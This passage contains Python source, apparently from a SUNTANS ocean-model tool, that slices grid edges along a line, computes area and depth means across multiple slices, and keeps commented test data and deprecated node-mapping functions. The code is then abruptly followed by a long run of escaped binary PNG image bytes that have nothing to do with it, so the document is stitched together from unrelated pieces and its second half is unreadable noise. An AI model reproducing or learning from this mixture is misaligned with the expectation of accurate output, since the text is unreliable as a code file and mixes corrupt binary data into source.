points = [Point((self.xp[nn],self.yp[nn])) for nn in nodes]
# Calculate the distance
dist = [line.distance(pp) for pp in points]
for ii,dd in enumerate(dist):
if dd == min(dist):
return nodes[ii]
def min_dist_line(cnode,nodes,line):
"""Returns the index of the node with the minimum distance
to the line"""
# Convert all nodes to a point object
points = [Point((0.5*(self.xp[nn]+self.xp[cnode]),\
0.5*(self.yp[nn]+self.yp[cnode]))) for nn in nodes]
#lines = [LineString([(self.xp[cnode],self.yp[cnode]),\
# (self.xp[nn],self.yp[nn])]) for nn in nodes]
# Calculate the distance
dist = [line.distance(pp) for pp in points]
for ii,dd in enumerate(dist):
if dd == min(dist):
return nodes[ii]
def min_dist_angle(cnode,nodes,line):
"""Returns the index of the node with the minimum distance
to the line"""
# Convert all nodes to a point object
points = [Point((0.5*(self.xp[nn]+self.xp[cnode]),\
0.5*(self.yp[nn]+self.yp[cnode]))) for nn in nodes]
# Calculate the distance
dist = [line.distance(pp) for pp in points]
dist = np.array(dist)
# Calculate the angle along the line of the new coordinate
def calc_ang(x1,x2,y1,y2):
return np.arctan2( (y2-y1),(x2-x1) )
angle1 = [calc_ang(self.xp[cnode],self.xp[nn],\
self.yp[cnode],self.yp[nn]) for nn in nodes]
# Calculate the heading of the line near the two points
def calc_heading(P1,P2,L):
d1 = L.project(P1)
d2 = L.project(P2)
if d1 <= d2:
P3 = L.interpolate(d1)
P4 = L.interpolate(d2)
else:
P3 = L.interpolate(d2)
P4 = L.interpolate(d1)
return calc_ang(P3.xy[0][0],P4.xy[0][0],P3.xy[1][0],P4.xy[1][0])
P1 = Point((self.xp[cnode],self.yp[cnode]))
angle2 = [calc_heading(P1,Point( (self.xp[nn],self.yp[nn]) ),line) \
for nn in nodes]
angdiff = np.array(angle2) - np.array(angle1)
# Use the minimum distance unless the point is a u-turn
rank = np.argsort(dist)
for nn in range(dist.shape[0]):
if np.abs(angdiff[rank[nn]]) <= np.pi/2:
return nodes[rank[nn]]
# if they all u-turn return the min dist
if rank.size==0:
return None
else:
return nodes[rank[0]]
# Loop through and find all of the closest points to the line
MAXITER=self.MAXITER
for ii in range(MAXITER):
cnodes = connecting_nodes(nodelist[-1],nodelist)
#if method==0:
# newnode = min_dist(cnodes,self.edgeline)
if method==0:
newnode = min_dist_line(nodelist[-1],cnodes,self.edgeline)
elif method==1:
newnode = min_dist_angle(nodelist[-1],cnodes,self.edgeline)
#print 'Found new node: %d...'%newnode
if newnode is None:
break
if ii>1 and abortedge:
if self.mark[self.grd.find_edge([newnode,nodelist[-1]])] not in [0,5]:
print('Warning: reached a boundary cell. Aborting edge finding routine')
break
nodelist.append(newnode)
if newnode == endnode:
#print 'Reached end node.'
break
# Return the list of edges connecting all of the nodes
return [self.grd.find_edge([nodelist[ii],nodelist[ii+1]]) for ii in\
range(len(nodelist)-1)], nodelist
class MultiSliceEdge(SliceEdge):
"""
Slice suntans edge-based data at all edges near a line
Used for e.g. flux calculations along a profile
"""
def __init__(self,ncfile,xpt=None,ypt=None,Npt=100,klayer=[-99],\
MAXITER=10000, **kwargs):
self.MAXITER=MAXITER
self.Npt=Npt
Spatial.__init__(self,ncfile,klayer=klayer,**kwargs)
# Load the grid as a hybridgrid
self.grd = GridSearch(self.xp,self.yp,self.cells,nfaces=self.nfaces,\
edges=self.edges,mark=self.mark,grad=self.grad,neigh=self.neigh,\
xv=self.xv,yv=self.yv)
# Find the edge indices along the line
self.update_xy(xpt,ypt)
def update_xy(self,xpts,ypts):
"""
Updates the x and y coordinate info in the object
"""
self.slices=[]
for xpt,ypt in zip(xpts,ypts):
self.xpt=xpt
self.ypt=ypt
self._getSliceCoords(kind='linear')
# List of the edge indices
j,nodelist = self.get_edgeindices(self.xslice,self.yslice,\
method=self.edgemethod, abortedge=self.abortedge)
self.j = j # Need this to calculate other quantities
self.nslice = len(self.j)
# Update the x and y axis of the slice
self.xslice=self.xp[nodelist]
self.yslice=self.yp[nodelist]
self._getDistCoords()
# Get the mask
self.calc_mask()
# Get the area and the normal
area = self.calc_area()
ne1, ne2, enormal = self.calc_normal(nodelist,j)
dx = self.df[j]
# Store all of the info as a dictionary
self.slices.append({'j':j,'nodelist':nodelist,\
'xslice':self.xslice,'yslice':self.yslice, \
'distslice':self.distslice,'area':area,'normal':enormal,'dx':dx})
# Find the unique j values and sort them
j=[]
for ss in self.slices:
j = j + ss['j']
j = np.array(j)
self.j = np.sort(np.unique(j))
# Find the index of each slice into this j array
for ii,ss in enumerate(self.slices):
ind = np.searchsorted(self.j,np.array(ss['j']))
self.slices[ii].update({'subind':ind})
self.j = self.j.tolist()
def loadData(self,**kwargs):
"""
Overloaded method of MultiEdgeSlice
loads the data and then inserts it into each slice dictionary
returns a list of 3D arrays
"""
SliceEdge.loadData(self,**kwargs)
data=[]
for ii,ss in enumerate(self.slices):
data.append(self.data[...,ss['subind']])
return data
def mean(self,phi,axis='area'):
"""
Calculate the mean of the sliced data along an axis
axis: depth, area
depth: returns the time and spatial mean. Size = (Nslice,Nk)
area: returns the area mean. Size = (Nslice,Nt)
"""
Nslice = len(self.slices)
Nt = len(self.tstep)
Nk = self.Nkmax
if axis=='area':
data = np.zeros((Nslice,Nt))
for ii,ss in enumerate(self.slices):
area_norm = ss['area']/ ss['area'].sum()
data[ii,:] = np.sum( np.sum(phi[ii]*area_norm,axis=-1),axis=-1)
elif axis=='depth':
data = np.zeros((Nslice,Nk))
for ii,ss in enumerate(self.slices):
phimean = np.mean(phi[ii],axis=0) # time mean
dx = self.df[ss['j']]
ne = len(ss['j'])
dx = np.repeat(dx[np.newaxis,:],Nk,axis=0)
dx[phimean==0.]=0
dx_sum = dx.sum(axis=-1)
dx_sum = np.repeat(dx_sum[:,np.newaxis],ne,axis=-1)
dx_norm = dx / dx_sum
data[ii,:] = np.sum( phimean*dx_norm,axis=-1)
else:
raise Exception('axis = %s not supported'%axis)
return data
#####
## Testing data
#
####
## Inputs
#ncfile = 'C:/Projects/GOMGalveston/MODELLING/ForcingSensitivity/rundata/GalvCoarse_AprMay_2010_TWRH_007.nc'
#
#xpt = np.array([ 334640.1250722 , 331097.21398258, 327837.73578013,
# 324861.69046485, 323444.526029 , 321177.06293164,
# 319334.74916504, 318059.30117277, 319618.18205221,
# 322310.79448032, 326987.43711862, 329113.18377239,
# 332939.52774918])
#
#ypt = np.array([ 3247017.02417632, 3247867.32283783, 3247867.32283783,
# 3250559.93526594, 3254386.27924273, 3259488.07121179,
# 3263456.13163216, 3267140.75916537, 3272525.98402159,
# 3275785.46222404, 3281170.68708027, 3287264.49415442,
# 3292649.71901064])
#
#outfile = 'TestSlice.mov'
####
#sun = Slice(ncfile,xpt=xpt,ypt=ypt,Npt=500)
#
#temp = sun('salt',range(23),method='linear')
#
## Test plotting
##sun.pcolors(t=1,xaxis='distslice')
##plt.show()
#
## Test animation
##sun.animate(xaxis='yslice')
##sun.saveanim(outfile)
##plt.show()
#
## Test the xtplot
##sun.xtplot(zlayer='seabed',xaxis='yslice')
##plt.show()
#
#sun.plotslice()
#plt.show()
#
#tempnodes = sun.cell2nodeki(temp[0,:],sun.cellind,0*np.ones_like(sun.cellind))
#cell_scalar = sun.loadData(variable='temp')
## Get the values at the nodes
#for kk in range(30):
# print kk
# tempnode = sun.cell2nodek(cell_scalar[kk,:],k=kk)
# Gradient routine
#dH_dx,dH_dy = sun.gradH(sun.dv,0)
##
#sun.plot(dH_dx,titlestr='')
#plt.show()
# Test out an interpolation tool
#temp = sun('salt',1)
#dT_dx,dT_dy = sun.gradH(cell_scalar[0,:],cellind=sun.cellind,k=0)
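####
## Example: volume flux through an edge slice (a sketch only -- 'ncfile',
## the point arrays and the variable name 'U' are assumptions, not values
## taken from this module)
#
#sun = SliceEdge(ncfile, xpt=xpt, ypt=ypt)
#sun.tstep = range(10)
#u = sun.loadData(variable='U') # edge-normal velocity, (Nt, Nk, Ne)
#Q = (u*sun.enormal*sun.area).sum(axis=-1).sum(axis=-1) # flux per step [m^3/s]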
########################################################
# Deprecated functions
########################################################
# def cell2nodek(self,cell_scalar,k=0):
# """
# ### NOT USED ###
#
# Map a cell-based scalar onto a node
#
# Uses sparse matrices to do the heavy lifting
# """
# if not self.__dict__.has_key('_datasparse'):
# self._datasparse=[]
# self._Asparse=[]
# self._indsparse=[]
# for kk in range(self.Nkmax):
# self._datasparse.append(sparse.dok_matrix((self.Np,self.Nc),dtype=np.double))
# self._Asparse.append(sparse.dok_matrix((self.Np,self.Nc),dtype=np.double))
# self._indsparse.append(sparse.dok_matrix((self.Np,self.Nc),dtype=np.int))
#
# for i in range(self.Nc):
# for j in range(3):
# if kk <= self.Nk[i]:
# self._Asparse[kk][self.cells[i,j],i] = self.Ac[i]
#
# self._Asparse[kk]=self._Asparse[kk].tocoo()
#
# for i in range(self.Nc):
# for j in range(3):
# if k <= self.Nk[i]:
# self._datasparse[k][self.cells[i,j],i] = cell_scalar[i]
# #self._Asparse[k][self.cells[i,j],i] = self.Ac[i]
# #self._indsparse[k][self.cells[i,j],i] = i
#
# node_scalar = self._datasparse[k].tocoo().multiply(self._Asparse[k]).sum(axis=1) / self._Asparse[k].sum(axis=1)
#
# return np.array(node_scalar).squeeze()
# def cell2nodekold(self,cell_scalar,k=0):
# """
# Map a cell-based scalar onto a node
#
# This is calculated via a mean of the cells connected to a node(point)
# """
#
# # Area weighted interpolation
# node_scalar = [np.sum(cell_scalar[self.pnt2cellsk(k,ii)]*self.Ac[self.pnt2cellsk(k,ii)])\
# / np.sum( self.Ac[self.pnt2cellsk(k,ii)]) for ii in range(self.Np)]
# return np.array(node_scalar)
#
# def cell2nodeki(self,cell_scalar,cellind,k):
# """
# NOT WORKING
#
# ## Needs an additional lookup index to go from local cell index to the main
# grid cell index
#
# Map a cell-based scalar onto a node
#
# This returns the nodes values of the nodes connected to cells, cellind at
# vertical level, k
#
# This is useful for finding the nodal values for a limited number of points, i.e.,
# during interpolation
# """
# ind = self.cells[cellind,:]
#
# node_scalar = np.zeros_like(ind)
#
# ni = cellind.shape[0]
#
# for ii in range(ni):
# for jj in range(3):
# node_scalar[ii,jj] = np.sum(cell_scalar[self.pnt2cellsk(k[ii],ind[ii,jj])]*self.Ac[self.pnt2cellsk(k[ii],ind[ii,jj])])\
# / np.sum( self.Ac[self.pnt2cellsk(k[ii],ind[ii,jj])])
#
#
# return node_scalar
#
# def pnt2cellsk(self, k, pnt_i):
# """
# Returns the cell indices for a point, pnt_i at level, k
#
# (Stolen from Rusty's TriGrid class)
# """
# if not self.__dict__.has_key('_pnt2cellsk'):
# # build hash table for point->cell lookup
# self._pnt2cellsk = []
# for k in range(self.Nkmax):
# self._pnt2cellsk.append({})
# for i in range(self.Nc):
# for j in range(3):
# if not self._pnt2cellsk[k].has_key(self.cells[i,j]):
# self._pnt2cellsk[k][self.cells[i,j]] = []
# if k <= self.Nk[i]:
# self._pnt2cellsk[k][self.cells[i,j]].append(i)
# return self._pnt2cellsk[k][pnt_i]
#
# def pnt2cellsparse(self,pnt_i):
#
# pdb.set_trace()
# #self._pnt2cellsk = sparse.dok_matrix((self.Np,self.Nc),dtype=np.int)
# testsparse = sparse.dok_matrix((self.Np,self.Nc),dtype=np.int)
#
# for i in range(self.Nc):
# for j in range(3):
# #self._pnt2cells[self.cells[i,j],i] = i
# testsparse[self.cells[i,j],i] = i
#
# pdb.set_trace()
\xd4\xa3\xa3&A%\xc3\xbe\x16r\x84v\xac\xdba\xd3=L\x9b\xcaC{\xdc\xff\x957\xad\xc1 \xba1\xe0\x10\x8ex\x84\x00\xa0\xfbKV\xcc\xea\xb4\xca.\xe2\xf5\x98W\xa0\x18\x89G+Pg{\x1bM\x84\xd6\x84\x9f\xee\xb7\xe5>\xa6w\xf2\xd0{\x1e\xb8m\xa3\x1fb\x1f\xb6c\xf8\xa8\xaf\x12\x00\xa7~\xcf\xb7\x9e\xbb\xda\xe6KN\xb3&<H\xbct\x94%\x09eGG&\xa2$\xc8\xb0\xf6\x80\xee\xc7\x98\xda\xc9_n\xb2\xf2\xc1\x1d\xd6\xe3=\xec@\x11>\xb0\x00|\xf2\x87\x9ex\xf0b\xe7\xdd8\xdb\xff\xd4\x1e#\xb3$R\x89\x8e\x8a\x04\xb92\xa1\xc9\x9b\xab\xe9\x98\xca\x15\xaf\xb8\xf9\x85^\x9b\xb0k,%h\x98\x00|~\x9d\x9f\xdf8\x8f\xcc\xc9(G*\x8e\x8e\x80\xb4F5\xd51\x8bI)/\xf4z\x05\xfd\xd8\x86\x14\x1a.\x10\xbf\xa9\xcbn\x9c\x8c\x92\xa3\x17\x80\x0c\xfa\xabZ\xa7qp+\xd7L7\xe7\xd1\xdd\x9eB\x0a\xc7D@\xd1\xb2t\x94\xcc\x0c\x14\x1d~\x06\x02\x80\xf7\x1f\xf2\x1cq\x94\x89\xa7\xd0\xf7\x06\x9f\x9a\xe2\xa3\xbf\x16x\x16\x8e\x9d@\xf4\x87j\xe8@\x09\xb5\xc3\x14_C\x8af\xd4\xdfG\xa2\x8e\x1a:\x19\xa9rR\xdel\x14\x90C\xf5\xd8\xbc\x91\xa5\x96\xa4\x15tb\x04\xa3c)\xa3\x8a\x22\xb6`+\xb6\xa1\x84\x14e\x8c\x1e&\x11\x9dT*Lmr\x16\x9a\xc6\xd2\xf8\x0e\xc4U\xd8\xa9\xb30\x9dXD\x05\x00Y\xf4c\x1frh\x22\xf4\xa3\x17'\x12;\x90\xa2\x0e\x80\x14\x09\x86\xe9\x9aA\xe1\x80\x09S\xb2\xa6\xeeO\xed\x87\xc6w`\xd0\x9cr\x998\x15E\x8c\xa2\x8c\x1a\xde\xc5\x0eDBJ\xd8\xc0\xce\xa7\xd8\xf6$~L\xd8\x84\x22j\xc6\xba\x81\x12\xb2\x18\xa2k:\xfde\xfel\x9a\xdfC\xf6\xd8\x08\x04\xcb\xea)\xa1\x05\x15\xd4Q\xc5f\x0c\x12r\x84=\xec_\xc7\xe0\x1e&\xb7\xd3\xd5A\xcfn\xb6\xad!\xfc\x17a\xe7!W\xff\x0a\x11\x996F\xaa\x5c\xd0\xeeB\xe4\x904^\xa0jI\xbd\x86VT0\x8c7Q%\x0cR\xde@\xff&\xa6Ldk\xd1K-k]:\xe9I\x1f\xdd]\xf3bW\x0b\xef\xbeJ\xdf\xb3\x84\x9f\x11\xfa\x90\xa2\x8a\x806\xaaU\xa6\xe5\x9c\x8d\x02r\x8d\x17\xa8[\x92m&\x16\xb0\x17o\x13j\x84\xb7\xe9\x7f\x8bLJH\xf4\x9e\xf3\x13\xd7-|\xde\x9dx/e\xd3\xfc\x17|\xfas\xbf\xb4\xa8\x90\xd7\x97\x96y\xeb%\x8a?\x22\xbcE\xe8G\x169&\xe491\xebtc\x83\xdc\xd0\x8f|\xf1\xabB}\xb9\x18o\x15\xebw\x8b\xf1\x0e1.\x17\x87>+\x96\x96\x8a\xe5e\xe2\xaay\xee\xc1E8\x1f'\xa3\x19\x00\x19\x14\x1e\x99\xeb\xaf\xf6\x7fL\xec>_
\xdcx\xae\x18\x97\x8a\xf1n1\xfe\xad\xb8\xf3\x22\xb1{\xbe\xb8\xb8\xd5ehol\x07F\x5c4\x92\xa2B\xd8\xc7\xc8.\x0e\x1e\xa0\xad\xc0\xfa>\xcfM\xfa7\x9f\xf9\xda\xaf<\x8d\xddx\x13;P\x02@\x0d\xa3\xd7\xbe\xe6\xbbS^\xd4\xba7\xb5\xa6\xa5\x99\xd7\xb6\xb0\xf1\x09\xf40\xa3\x93\x035>\xden\x01\xb2\x8d]d\xc1gC\x8d\xb4L\xf1 \xed\x05z\x0e\xe8^\xf2\x8c\xbb\x7f5\xa0\x1bC\xd8\x8b\xfe#,\xa1\x14\x07\x17o\xb0\xec\x8a)\xee\xb9\xf3\x14?h\xc9:m\xc3O\x99\xdcN-\xb2p\xa2%\xf8>2\xa85\xe6\x08\xddjK\xf1:1\xde(V\xafS\xfa\x8b\xd9V\xe2\x22,\xc4Ih\xf6\xdb\x93 \xff\x9dS]\xbb\xf9\x5c\x95\x8d\x1f\x11_\x99+\xfeb\x8e\x1e\x9c\x8a\x09\x8d\x9b\x81\x15b\xbcE\x5cw\xb1\x1f\xe0c\xf8}\x9c\x866\x04\x1f\x8c\x1c&<s\xa6\xfb\xf7\xcc\x17\x8b\xbf\x0e\x16\xa0\xbda\x02\x80\x93\xb0\x18\x1fF'2\x1aK\x1e\xd3\xf0\xbb8\x17m\x8d\x9b\x01\x12\x0cc\x13\x8a(k<e\xf4\xa3\x8c\x1a\x0e:\x02\xc7\xfd\xef6\xff\x07\xe2\x88\x5c\xa0\xce\x9a\xc4\x5c\x00\x00\x00\x00IEND\xaeB`\x82\x00\x00\x05\x0e\x89PNG\x0d\x0a\x1a\x0a\x00\x00\x00\x0dIHDR\x00\x00\x000\x00\x00\x000\x08\x06\x00\x00\x00W\x02\xf9\x87\x00\x00\x04\xd5IDATh\x81\xed\x98OL\x5cU\x14\xc6?\xc5D\x93fl\x94V)5-\x09c,\x01i)CE\xde\xd0\xa1 \x14\xb0\xc8 J[\xb0\xe5O\x05\x064-\xcd\xc0Lg\xf8+(\x1b\xc5&mDhiS\x18\xc0>\xe9\xc4\x85I7\x1am\x17\x8d\x7f \x94\xa8i\xdc\x19\xdd\x18\x17$\xa6\xbap\xd3\x5c\xcfm\xd2\xc2{\xf6\x9e\xabq\x01\xe8\x0c\xf9%\x84\xef\xe3\xbcwr\xbe{\xef\x9b\x07\xc4>\xab\xe0\x93\x08d\xd4\x01s\x0d\xc0\xac\x8al\xe04\xa7K\xdc\xc0\xa8\xcech\xeaT\x03\xf39\xc0)\xce\xf3\x02\xf05\xddv\xdc\xdd\x06\xb6\x00F/ \xfa\x18<@\x84\xd3%{\x01S\xe7)\x02\xa68=H\x14\x03\x93\x9c\xc7\x07\xdc\x8c5\xb0\xaa\x1ax\xe2A8\xf780\xc1\x91\xee@X\xe7)\xdc\x80\x9e\xea\x04Lp\xb8\xd6\xf3u\xf2\x1c\x88\xa4\xafC\x88\xf3\x18\xeb\x10\xa1\xdb\xbeoi\x02\x0e\x18=\x1e\x88^\x06\xcfVD8]\x124`\x8an\x08\x0e\xef6Lq5\x02\x06M\xc0\x89I\xce\xd3\xec\xba=\x81\x07b\x0d\xacp\x03Kk 
\xde\x81m/\xa7bt\x7f\x1aFTl\x7f\x1c'8]R\xf54\xba\xa2U\x18\xe10\x92\x10\xe2jxSpng\x22:8O\xa1\x13\xe7\xe9\xb6\xef\xbf\xdb@B<\xb2jK0W_\x8aY\x15YOa\x98\xd3%u\xc5\x18\xbbz\x0a\xb3\x1cy\x19\x18\xe1j\x1c|\x0e\xd7w\xa5\xf0\xd7z>\x07\xb3\xd6m\xf41\x8aP\x1d\x8d\xa7^\x8dg;E\x88\xd1%\xc1\x83\x14\xa1+\x14\x15\x06\xefn\x8a\x10S#PM\x11\xdaE\x11b<\xcd\xe5\xf65\xb0\xe6\x1b\xd8\x08w\xe7a\x88.\x06\xd9\x00\xa7K\xa8\x81\x0f\xff\xf8\x04\x82\xa3\xdc\x8d)\xae\x86\x7f?D\xa1\x0b\xd3\x9c\xe7\xd52\xdb\x22\xce\xccDr\x7f?L\x8e\x92\x12t\xe6\xe7\xc3\xe4\xa8\xacD\x8f\xae\x8ea \xc4\xd5\xf0x0SS\x83N\xae\x86\xdf\x0f\xd3r\x90eg\xc3\xb8u\x8bF,\xd4\xd4\xd7S\x84zi\x84\x0c\xc1 E\x88\xa9!\xf1z)BL\x8d@\x00bh\x08\x93\x5c\x8d\x85\x05[\x84b\x0d\xact\x03r\x0d\x98&\xce\xce\xcc\xe0\xcc\xbd\xb8t\x09\xa3\xe5\xe5h\xaf\xaa\xc2\x19\x8eC\x87\x10R\xd5\xb8\x03e\xbc\x83\xabQQ\x81\xf3\xad\xad8.\xaf\xa9\xaaq\xf2$\xceY\x0e2\x17M\xe0\xda\x02\xc4\x17\xdf\xa8i\x0b\xc0\xfc\xf2[\x88;\xdc\xcb\x13\xee\xc3G\x5c\x0dIA1f\x1aZ T\xd44@\xb4\x87\x11\xe5j\x8c\x9b\xf8\xdd\xb2\x0b\xc9\x06~\xa5\x08\xdd\x14j\xe8\xe6\x22\x9c.\x19|\x17\xa6\xceSJ\x11\x0a\xf6Q\xdc\x14\x1c\x0bR\x1d\x8a\x10W\xe3\xda\x82m\x1b]\xa3\x0d,[\x03\xcf\xc0\xfd\xdd\x0f\x107~R\xe3\x0f\xe2\x03N\x97t\xbf\x85\xe8\x8d\x1f\xe9w\x86\xa2R\x5cl9\x0e\xa1B\xc6(L{\xfd_\xea/\xab\x11\xbd\x8c\xdf,\x0d$\xef\x84\xb3m\x18\xe3\xfe\xf7qAE\xc9\x11\x049]Ry\x14\x9d:\xcf\x8e\x5c\x04\x9e-\xc3\x05\x15Y\xc5\x88\xeckB\x80\xab\xd1\xf0\x06&,\x8b8\x95\x22\xf4\x19E\xe8\x8aPSK\x11\xe2tI+EH\xe7qS\x84\xa8\x96Pq\x80\x22\xf4\x1aE\x88\xab1f\x8fP\xac\x81\x95i`i\x17r\xd2Avb\x1c\x910CY3\x82\x9c.y\xf1\x18\xbat\x9e\xf4\x5c\x84r+\x10Q\x91S\x86\xe9r\xcd\xb5|\xef`\xd2\xb2\x06\xb6\xd0\x04\xda\x7f\x86\xe8\xf8E\xcd\xee0\xa68]\x92?\x88\xa8\xceS\xf0&.r\xfa\xeb\xdfC\xec\x19\x80\xc9y\x0e\x7fz{\x17\x8a\xb34\xd0K\x11\xea\x13j<\x14!N\x97\xec\xa5\x08\xe9<Eo\xd3\x8b-F\x0f.R\x1d\x8d\xc7g\x8f\xd0\x7f\xa2\x81\xa69\xfa\xaa6\xaf\xc6\xa0g!N\x97\xe4\xd1\xb3\x90\xce\xe3\xe9\xc6\x0c\xa7\xd7\xd1\xd7Nw\x08Q\xce\xf3\xd2\xb4\xedY\xe8\xe1\x1dx2\x9
5\x9e\xfe\xd2\xa2\x18Q\x91\xd0\x88vN\x97lnCH\xe7IhA\x07\xa7\xa7L`l\xb3\x0f~\xce\xe3\xb4?\x8d:h\x02\x1e\x8a\x90G\xa8\xd9J\x11\xe2tI2EH\xe7qR<8\xddX\xd4{\x5c\xf6s`\xd55@\xe7\xc0\xff\xab\x81\x87\x92\x90\xb4\xe9\x08\x0665\xaaY\xefF\x13\xa7K\xe2\x0b\xd0\x9a\xd8\x84~\x8eGr\xe1\xb3\xff\xcdR\xa7\x16\x83\x8fz\xd0\xa8\xfa\x7f\xe9\xd9x\x00\x83X\xfeV\x02\xf48\x0d\x9a\x00\xfbC\x13\xd08\x04h\x02Z\x0fM\x80\xd5\x17\xff\x86\xc7>\x01P\x84b\x0d\xach\x03\x19p\xe1s\xcc\xe1*\xbd\xf5U\xe1\xc3{\xac.\xf1\xe3\xac\xd6\xd3\x86aV\xff\x18\xd7qTs\xadQ\xdb\xdbi\xe4 \x8d\x04\xbe\x81\x00\x86\xb47\xd7\x8f\xd3ZO\x0f\xcd\x89\xd3/c\x1e]\x1a\xcf\x04\xbe\xb2\x1cdk4Bqk\xbd\x81U\xbc\x88\xe9 \xfbg\x0ddb\x03\x06\xd0\xc8R\x8dR\xad\xa7\x11\xfb\xfeu\x9d\x1e4\xe3\x15\x14\xb3\x9ev\xf2X\x0e\xb25\xfc\xf9\x13\xd5\x98\xa6TH\x88<o\x00\x00\x00\x00IEND\xaeB`\x82\x00\x00\x09\xf1\x89PNG\x0d\x0a\x1a\x0a\x00\x00\x00\x0dIHDR\x00\x00\x000\x00\x00\x000\x08\x06\x00\x00\x00W\x02\xf9\x87\x00\x00\x09\xb8IDATx^\xbd\x99klS\xe7\x19\xc7\x7f\xc7\x10\xc7N\x0c\xd8!\xc4!$!q\x80\x84K\xd24\xac\x12\x81\x16\xd2\x82*\xb4+\xeb\x85\xeeC\xdb\xb1\x09\xb6j\xfb\xc2\x97I\xd3\xf6\x05>\xed\xc3\xa4)\xda\xa6M\xad\xb46S[\xa9U\xab6\xdd\xd6\xad\x1daM\xbb\x95\x02%`.\x05;mR'6q\x02\xc1v\x82s3\xccg\xef\xfc*}u\xce\x89\x1d{\x83>\xd2\xa3\xd7\xef\x93\xe3\x93\xff\xff\xb9\xbd\x17k\xdcii{\xe9\x1e\xc0\x0dt`\x95PF\xcf>\xf9>wH\xb4;\x00x-\xb0O\xaa\x04\xbd\xcc]\x9aQ\x83\xe8\xa0\x03\xd1\xa1kH\xa1{^\x05\xa1\x89/\x8f\x80\x02\xbe\x0b8\x0c\xec+_\xedaS\x9b\x8f\xf2J\x0fk\xea\xbd\xa0C\xd52p.\x05]\x81\xa7\x7f\x1ct\x1d\xc6Gc\x04\xfd\x83\x84\x82\x11\x92\x13S\x09\xa0\x0b\xe8\x14D\x86\xee\x1e\x01\x05|\x05p\x048\xbci\xab\x8f\xf6\xdd\xcdl\xdf\xe0\xa2\xa1\x0c\xd6,\x83ue\xe4\x94\x1b\xd3\x92\x88?\x0a\xe7F`$4F\xdf\x07\x17\x18\x1d\xbe\x96@\x928zw\x08\xa8\xfc\xee\xaa\xf6U\xb4\xee\xdd\xdf\xce\xeeM.\x1e\xf6A\x99\x13\x00b3p\xf5\xa6Tt\x00\x15\x812\xa7\xd4\xf5+\x15\x80\xf1i\xf8h\x08\x8e\x0d\xc0\x95\x8baN\x1e\xebCD\xc4\x0f\x1c\x10D\xce\xdf9\x02\x0a|\xef\xd6\xfb\x1b\xdd\x8f>\xf1\x15\xf6o\x84\x06\x0f\x
cc\xdc\x82\x7f\x86\xe1LT\x12\xd0\xe7\x81\xebHE\x8e\xc89i]FJ\x10\xe1\xc1zXY\x02\xd3)x\xf5\x22\xfc#\x98\xe2\xe4\xdf\xfb\xf8\xec\xe2`\x02\xd8\x97O\xb1k\x05\x14\xaa\xff\xabOls?\xfc`\x03?h\x05g\x11|2\x0e\xaf]\x91$t\x14pE\x22\x9b*2-^x|\x8b$\x22R\x8a\xe7\xcf\xc0\xc7\x1f\x068\xd5\xd3\x07\x92\xc4[w\x82\xc0{\xcd\xf7\xf9:\x0e\x1el\xe7P\xab,\xce\xbeQx=hH\x95\x05\x81\x83\x05\xb4\x9a\xa7\xd5\xfck\x1b\xe0\xebM0\x9c\x80_~\x00\xa7\x05\x89\xd3=}\x09\xa0#W:-\xc9\xa7\xdb\x14;\x8b\x8e|\xe7\x87\x0f\xf1d\xcb\x12*J\xe0\xec\x18\xbc\xd1\x0f\x9a&\x15\xa1\x99a~D\xfd\xcd,Z\x16\xaf\xf5\xdf\x80\xe0u\xd8U\x0f\xf7VA(]N<6\xe5\x88]\x8boc\xf5#\xaf\x10}c\xee\x7f\x22 \xbe\xdc\xb5}\xcf\xe6\xba\xfd\x1dUl_\x03\xd1$\xbcxY\x01\xd4L\xe0Q6\x8b*A=k\xeaP\x9f\x8c\xc1\xeeuP\xeb\x86a\xcd\xcb\xd5\xc1h\xe5\xcc\xd4\xacC\x10x\xb70\x02*\xf7;\x9f8\xb4\x8b\xa7\x9a\x97dR\xe7\xf5~\x98\x98S\x9eW\x9eV\xc0\xc1\x8c^\x11[L&\xe7`0\x06\x8fl\x869}\x09\x93\x8e\x95\x04\xcf}\xf6\xdf(\xf4\x0a\x12C\xf9\x11P\xde?\xd0\xd8R\xbdw\xef\xee\x06\x1e\xa8\x86\xd1)8\x1e\xb6z\x1f3\x09-\x9b\xf7\xf3#1>%\xc7G\xb7\xc0\xb9q'\xd3\xb7@\xac\x13u\x82\xc0\x1f1\xc9RrKG\xddz/\xf5+\x00 4\x096\x05\x00}\x1e\xbcl\x97h\xd2\xb6\xa0\xd8\x80\xb4\x22\xa1l\x92,\xe8F'\xfc9\x00\xed5\xf0\xfd\xfb\xe0j\xac\x89\xcb\x1f\x07:R\xa2\x1e\xcd\xad\xd5Fni]]\xe3\xc1)iRY\x8a\xf4\xaeM\x8e\xb6\x8c\xca\xb9\xcdj\xc7f\x93\xaai\xca\xaeF\xb3Z\xa3\xf8\x97\x004\xad\x82\xf5^;\xb5\x1bj\x00\x0e\x17\x9aB\x9d\xf7\xb6\xfb\xa8\xafr1\xfbo\xa8,\x91\x00\xa2S\xd6\xee\x83\xb9(\xb5\xc5\xd3F'\x87\xe80<!\xa3P\xb4\x04\x82\x09;b\x81k\x12it\xb4\x90\x08\xf85\x0d.\xde\x80\xb7C\xf0\xfceI\xa2\xd1\xa3<)=,\xc7l\x9e}\xa8\x16\x0e\xb6\xc0c\x8dP\xe6\xc8\xd1\xbd\xb06\x84\xe3\x03\xb2\xad\xae^\xebU\x9b\xc8\x02\x08\xb8\x05(\xe6fS\xbc\xf4\xfb\xf79w6\xcc_\x87\xc1\xedP\xe9\xb4XJ\xb4\x97\xa7x\xf7\xdd\x00G\x9f\xbb@\xff\xa5\xb0\x5c\x08\x8b\xb2=o%\xe1\x8fBy)\x94\x14Aem\x05@\xeb\x22\x04T\x0bu8\x8b\xea\xaaj<\x9c\xfbh\x90+\xfe\x08/\xfd\xee\x03\xce\x9e\x18\xa0\xef:\xb8\x8b%\x09\x95\xfbV 
